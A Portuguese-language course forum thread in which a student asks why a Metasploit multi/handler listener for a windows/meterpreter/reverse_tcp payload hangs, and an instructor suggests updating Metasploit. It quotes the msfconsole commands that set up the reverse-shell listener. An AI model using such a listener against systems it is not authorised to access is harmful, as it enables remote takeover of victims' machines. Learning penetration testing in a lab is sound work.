2
respostas

Problema com handler na conexão reversa.

Após realizar todos passos com sucesso descritos na primeira parte da vídeo aula, cheguei no momento de especificar o recebimento da conexão reversa com o handler. Fiz o que foi ensinado na aula:

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.26 LHOST => 192.168.0.26 msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.26:4444

Porém ele trava nessa etapa, não ocorrendo o "Starting the payload handler..." O que pode ser e qual a solução ? Desde já, agradeço a atenção.

2 respostas

Olá Lucas!

Ficou muito tempo e não aconteceu nada?

Pode ser que tenha rolado algum problema com o software. No site metasploit.com diz houve um update pequeno há 3 dias atrás, incluindo correção de bugs. Tente atualizar o Metasploit (ou mesmo reinstalar) e depois tente fazer novamente os passos da aula.

Procurei este erro por um monte de fóruns e infelizmente não encontrei nada sobre este erro. Pode ser que por algum motivo ainda assim o serviço estivesse funcionando. Você tentou fazer acesso ao arquivo para ver se tinha iniciado o serviço?

Bom, vou tentar encontrar no mínimo uma explicação para este problema.

No aguardo do seu retorno.

Obrigado pelo retorno.

Deixei por muito tempo mas nada aconteceu. Não inicia sessão com a vítima, por esse motivo, nada pode ser feito. Irei tentar atualizar ou reinstalar o metasploit pra tentar obter resultado diferente.

Quer mergulhar em tecnologia e aprendizagem?

Receba a newsletter que o nosso CEO escreve pessoalmente, com insights do mercado de trabalho, ciência e desenvolvimento de software